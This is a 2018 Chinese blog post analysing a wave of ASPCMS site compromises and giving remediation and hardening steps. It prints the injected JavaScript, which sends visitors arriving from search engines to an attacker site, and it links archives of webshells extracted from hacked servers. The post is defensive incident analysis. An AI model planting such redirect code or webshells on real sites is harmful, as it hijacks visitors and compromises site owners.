【红色预警】ASP被黑|ASPCMS系统挂马修复紧急预案-♚纪实阁付涛♚

【红色预警】ASP被黑|ASPCMS系统挂马修复紧急预案

这几天ASPCMS圈子可以说是狼嗥声不断;可不是因为对面母狗的呼唤,而是隔江对岸的黑手,对所有的ASPCMS网站虎视眈眈,导致大批量的ASPCMS网站在短暂的时间里面都被挂马;

而这批被挂马的网站里面,据谍豹云销的观察发现,并非只有ASPCMS这个程序所建设的网站存在被挂马的现象,其它ASP网站均存在此类问题;

被挂马网站对象

受害群体:个人站长、中小型企业、政府网站

举例:

个人站长:www.yunxiaosoft.com

中小型企业:www.bailongmm.com

政府网站:www.szhd.gov.cn

挂马访问入口异常

通过搜索引擎(不局限于百度、360、SOSO、SOGOU……)登陆进去被挂马网站时候,则会自动跳转至目标网站,因为目标网站域名比较多,在这里,我们截取了同一个网站不同的LOGO,不同的域名;

以上网站本人2018年03月08日曾向【12377举报网站】举报过,但是至今无任何形式的回访与回复,当前光明正大、顶风作案的网站依旧我行我素;

挂马现象分析整理

当我们发现这类网站之后,表面上看是在网站主页index.asp或者index.php里面挂马的,但真正当你分析后,你会发现,当前木马并没有真正意义上修改你的主页文件,相反,他是在你主页文件页的基础上,生成了一份,然后挂入了自己的目标代码,并将名称命名为index.html;

注:这个地方有一个常识,就是为什么命名为index.html而不是其它名称,玩过服务器或本地搭建过运行环境的,都知道有一个参数叫:网站文件访问首选顺序,而这个顺序里面默认index.html是第一优选顺序,而通过这个顺序里面默认是有以下几个后缀:

index.html、index.htm、default.html、default.asp、index.asp、index.php、default.php……

当网站主页文件为index.asp时候,如果用户直接访问域名,则服务器会优先在网站根目录下按顺序遍历各文件,如果发现有index.html则先访问此后缀文件,如果没有,则继续直到index.asp,如果整个都遍历完了,都没发现,则返回错误页面;

【内容来源于:https://www.diebaosoft.com/】,未经授权,谢绝转载

连接FTP,找到网站根目录下的index.html,用NOTEPAD++打开,发现在第一屏发现如下代码:

因为这些代码都是加密的,所以无法直接看清内在涵义;不过我们拥有CHROME浏览器的前端分析神器:审查元素

通过审查元素我们发现以下代码:

从上图我们就可 非常详细的看到那张加密后的一整串代码被编译后的本来面目;看到这个了后,是不是后背一凉;

继续分析找到以下一段关键性代码:

<script type="text/javascript" src="https://www.域名替换.com/js41.js"></script>

打开上方这个JS后,我们发现完整代码如下:

  1. <script language="Javascript">
  2. var s=document.referrer
  3. if(s.indexOf("baidu")>0 || s.indexOf("sogou")>0 || s.indexOf("soso")>0 ||s.indexOf("sm")>0
  4. ||s.indexOf("uc")>0 ||s.indexOf("bing")>0 ||s.indexOf("yahoo")>0 ||s.indexOf("so")>0 )
  5. location.href="https://www.域名替换.com/";
  6. </script>

也就是这一段JS来判断来路并负责跳转;不难看到包括的搜索渠道来源还是蛮全的;连UC、神马这种都加进来了;

如果有朋友想研究的可以直接下载代码:

2018年05月28日分享:

今天在服务器上额外发现一批挂马的文件;特整理出来供大家学习分析,本站提供的文件仅供学习分析,以防范网站被黑、被挂马的情况出现;如有人拿资源去做违反纪律的事情,由本站无关;

额外分享两个大马给大家,也是从被挂网站里面提取出来的;

https://www.diebaosoft.com/wp-content/uploads/2018/03/20180307.zip" rel="external nofollow" target="_blank"> 电脑访问打开PC端 移动访问打开手机WAP端

问题处理办法

问题处理方案一

通过上方的操作已经知道了这个挂马的情况是怎么样子,那怎么样处理呢;我们要严格按照以下步骤进行操作;等过了这个阶段,再恢复:

第一步:立刻、马上删除根目录下的index.html文件(避免时间久了,被百度检测到,被标注恶意网站提示);

第二步:进入网站空间面板或者服务器IIS下,对默认首选访问顺序进行调整,除了保留index.asp其它全部删除;

第三步:将源码下载到本地,然后下载360杀毒,对网站整个目录进行全部盘扫描,涉及恶意大马的目录与文件彻底消除,关于360杀毒的另一种应用,曾经在以下这篇文章中亦使用到过:

注:因为360杀毒可能会把ASPCMS正常的ASP文件里面的函数列为安全隐患文件,建议清理,此时要理智,不要清理;待扫描完后,把有明显标注大马的文件全部清理干净,其它ASPCMS自身的文件保留

第四步:最后导致ASPCMS被挂马的根本原因是ASPCMS后台里面有文件存在漏洞,在尝试删除UD编辑器及模板管理、幻灯片模板后依然无法阻止这种挂马时,最终放出了绝招:删除后台管理文件夹;在需要使用的时候,再上传至后台;

问题处理方案二

将网站根目录下的index.asp修改为其它任意自定义名称如diebaosoft.asp;然后进入服务器IIS下,或者虚拟主机管理控制面板里面,在文件首选顺序里面,新增diebaosoft.asp首选文件,并由原来的index.asp的第一访问顺序改为diebaosoft.asp第一顺序,并作保存即可。

预防方案大体如下

预防方案一、打开网站后台登陆页面login.asp,然后删除标题里面所有包括类似【网站内容管理系统-Powered byV1.2.6正式版】这样的字眼;

作用:避免后台被搜索引擎收录后,用户直接通过标题关键词及URL搜索出网站后台路径

即使手工修改了后台目录也是没有用的;

预防方案二、如果是自己的服务器,可以考虑安装服务器安全狗,开启网站内容及网站后台防护,并开户木马文件及上传文件防护;

预防方案三、删除根目录plug下除\plug\comment\comment.html这个文件以外的所有文件(不删除此文件是因为程序在产品和新闻详细页面加载了此评论模板,如果删除会导致3002报错;)

预防方案四、IIS7.5 限制固定ip段才能访问网站下面某个文件夹如网站后台管理文件夹

Iis限制几个ip才能访问网站下面某个文件夹
安装iis7的角色功能 ipv4地址和域限制

选中要限制的文件夹 ,然后选择ipv4地址和域限制,选择 右边的编辑功能设置,选择默认拒绝,然后自行添加需要允许的ip地址。

 

通过以上方法进行处理后,到目前为止,本公司名下的网站没再出现被挂马的现象;

挂马终级大招:绝杀

对于这个方法,目前是绝对有效的,不过需要点专业知识,要不然,容易引起全身不适,轻者感冒,重者瘫痪。
我们知道ASPCMS之所有频繁被挂马,最最重要的原因是因为系统开源,大量的人员研究及所有文件路径公开透明;只要有一个可利用的漏洞存在,那么所有网站难逃魔掌;

那么此招的核心就是:将原ASPCMS开源系统里面所有涉及ASPCMS这四个字母的地方,全部改成“张三”、“王五”、“何麻子”,或者“1234”或者其它自定义的任意内容;此处需要修改的有三大块:

1、所有ASP文件里面的内容;

2、所有原文件名称里面所包括的aspcms

3、数据库里面字段名称;

这就是核心;这样处理后,虽然程序还是原来的程序,但是所有的文件名称及结构都发生了变化;100个人有100种解法;所以,这就好像告诉你:这扇门里面有5个绝品美女,只要进了门,可以任意摆布;但就是找不到门一样的感觉;

如果此绝杀法自己不会操作,可以直接下载下方我们修改完成无误的版本。功能跟官方原程序完全一样;无任何模块的删除;注:此方案不论是云服务器,还是虚拟主机,又或者VPS,均有效;不受网站托管环境限制;

可以将原来网站程序的数据快速直接升级至本程序里面使用;无兼容性问题,无数据丢失,无迁移隐患!

修改版本后台如下:

通过以上操作完毕后,再将站点由传统的HTTP升级为HTTPS站点;关于HTTP向HTTPS的升级,不懂的可以自行查阅以下文章

按照上述方法操作,也是我们自己的实战经验,而这个经验告诉我,是百分百可行的;

如果觉得不错,解决了你的问题,还请别忘记给我们一个评论;

关于ASPCMS如果大家碰到不懂的,欢迎留言,我们会为大家提供更多的咨询支持!

2018-07-24新查阅看到一段JS判断来路并进行另类跳转代码;

[url href=https://www.diebaosoft.com/wp-content/uploads/2018/03/news.zip]judge文件跳转[/url]

【友情提示:】
1、本文由 ♚纪实阁付涛♚ 作者:付涛纪实阁 发表,其版权均为 ♚纪实阁付涛♚ 所有;
2、文章内容系作者个人观点,不代表除个人作者外的任何第三方针对观点赞同或支持;
3、本站文章均为博主原创,如需转载,请注明文章来源;
6

发表评论